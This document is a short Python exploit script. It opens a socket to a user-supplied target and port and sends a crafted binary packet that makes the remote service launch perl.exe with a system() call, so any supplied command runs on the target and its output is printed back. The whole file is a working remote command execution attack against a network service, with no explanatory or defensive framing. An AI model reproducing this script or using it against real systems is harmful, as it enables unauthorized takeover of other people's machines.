import socket
import struct
import sys

def usage():
    print(f"Usage: {sys.argv[0]} <target> <port> <command>", file=sys.stderr)
    exit(-1)

def exploit(host, port, command):
    print(f"[*] Connecting to target '{host}:{port}'...", file=sys.stderr)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, int(port)))
    except Exception as ex:
        print(f"[!] Socket error: \n\t{ex}", file=sys.stderr)
        exit(-3)
    else:
        print("[*] Connected to the target.", file=sys.stderr)
    
    OFFSET = 46
    command = command.replace("\\", "\\\\")
    command_size = chr(OFFSET + len(command)).encode('latin-1')
    CRAFTED_PKT = b"\x00\x00\x00" + \
                  command_size + \
                  b"\x32\x00\x01" + \
                  b"\x01\x01\x01" + \
                  b"\x01\x01\x00" + \
                  b"\x01\x00\x01" + \
                  b"\x00\x01\x00" + \
                  b"\x01\x01\x00" + \
                  b"\x2028\x00" + \
                  b"\\perl.exe" + \
                  b"\x00 -esystem('" + command.encode('latin-1') + b"')\x00"
    
    print(f"[*] Sending payload '{command}'", file=sys.stderr)
    sock.sendall(CRAFTED_PKT)
    
    print("[*] Output:", file=sys.stderr)
    while True:
        response_size = sock.recv(4)
        if not response_size:
            break
        n = struct.unpack(">I", response_size)[0]
        response = sock.recv(n)
        response = response[5:].strip()
        response = response.replace(b"\n", b"")
        response = response.replace(b"\x00", b"")
        if b"*RETVAL*" in response.upper():
            break
        print(response.decode('latin-1'))

    sock.close()

if __name__ == "__main__":
    argc = len(sys.argv)
    if argc < 4:
        usage()
    host = sys.argv[1]
    port = sys.argv[2]
    cmd = sys.argv[3]
    if port.isdigit():
        port = int(port)
    else:
        print("[!] Error, invalid port value", file=sys.stderr)
        exit(-2)
    
    exploit(host, port, cmd)
    exit(0)